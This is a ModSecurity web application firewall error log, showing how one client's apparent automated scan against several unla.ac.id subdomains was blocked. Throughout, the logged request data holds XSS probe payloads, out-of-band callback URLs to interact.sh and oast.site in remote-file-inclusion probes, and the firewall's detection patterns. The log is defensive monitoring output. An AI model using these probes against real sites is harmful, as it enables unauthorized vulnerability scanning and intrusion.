"8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApYplsAAAAa"]
[Tue Aug 29 11:54:09.620705 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApV2y4AAAAJ"]
[Tue Aug 29 11:54:09.626606 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApJDYcAAAAY"]
[Tue Aug 29 11:54:09.975452 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApbUQ4AAAAh"]
[Tue Aug 29 11:54:10.084450 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158sCo-f0AAApWY0oAAAAM"]
[Tue Aug 29 11:54:10.620651 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAApV2zMAAAAJ"]
[Tue Aug 29 11:54:10.634793 2023] [:error] [pid 2648] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAApYpmEAAAAa"]
[Tue Aug 29 11:54:10.673963 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAApV2zUAAAAJ"]
[Tue Aug 29 11:54:10.736863 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAApV2zcAAAAJ"]
[Tue Aug 29 11:54:10.992117 2023] [:error] [pid 2648] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAApYpm0AAAAa"]
[Tue Aug 29 11:54:11.195806 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAApWY1MAAAAM"]
[Tue Aug 29 11:54:11.539037 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAApgAw0AAAAH"]
[Tue Aug 29 11:54:11.540767 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAAph8s4AAAAj"]
[Tue Aug 29 11:54:11.680145 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAAox7QYAAAAN"]
[Tue Aug 29 11:54:11.790947 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1588Co-f0AAApWY1oAAAAM"]
[Tue Aug 29 11:54:12.131235 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO159MCo-f0AAAph8tcAAAAj"]
[Tue Aug 29 11:54:12.131347 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO159MCo-f0AAApWY14AAAAM"]
[Tue Aug 29 11:54:12.606362 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb04mof4q41w3cng.oast.site found within TX:1: cjmnijtjmimvgniikdb04mof4q41w3cng.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAApgAxQAAAAH"]
[Tue Aug 29 11:54:12.711641 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0x16h1rkwewpa4.oast.site found within TX:1: cjmnijtjmimvgniikdb0x16h1rkwewpa4.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAApgAxcAAAAH"]
[Tue Aug 29 11:54:12.728340 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb04wrtbmim7odt1.oast.site found within TX:1: cjmnijtjmimvgniikdb04wrtbmim7odt1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAAox7REAAAAN"]
[Tue Aug 29 11:54:12.825437 2023] [:error] [pid 2659] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb06j6ieiy7jhi88.oast.site found within TX:1: cjmnijtjmimvgniikdb06j6ieiy7jhi88.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAApjILsAAAAm"]
[Tue Aug 29 11:54:12.871583 2023] [:error] [pid 2658] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0crqed1z1usn5k.oast.site found within TX:1: cjmnijtjmimvgniikdb0crqed1z1usn5k.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAApilx4AAAAl"]
[Tue Aug 29 11:54:13.548587 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0x6r9siwpo45fc.oast.site found within TX:1: cjmnijtjmimvgniikdb0x6r9siwpo45fc.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO159cCo-f0AAApWY2IAAAAM"]
[Tue Aug 29 11:54:14.120964 2023] [:error] [pid 2648] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAApYpoEAAAAa"]
[Tue Aug 29 11:54:14.147791 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAApQ2ZQAAAAb"]
[Tue Aug 29 11:54:14.151068 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAApbURgAAAAh"]
[Tue Aug 29 11:54:14.153562 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAApWY2cAAAAM"]
[Tue Aug 29 11:54:14.157214 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAAolKf4AAAAe"]
[Tue Aug 29 11:54:14.164416 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAAo2m-MAAAAA"]
[Tue Aug 29 11:54:14.604348 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAAo2m-QAAAAA"]
[Tue Aug 29 11:54:14.609908 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAApbURoAAAAh"]
[Tue Aug 29 11:54:14.640197 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAApmXssAAAAp"]
[Tue Aug 29 11:54:14.643723 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAAph8uEAAAAj"]
[Tue Aug 29 11:54:14.643851 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAAolKgAAAAAe"]
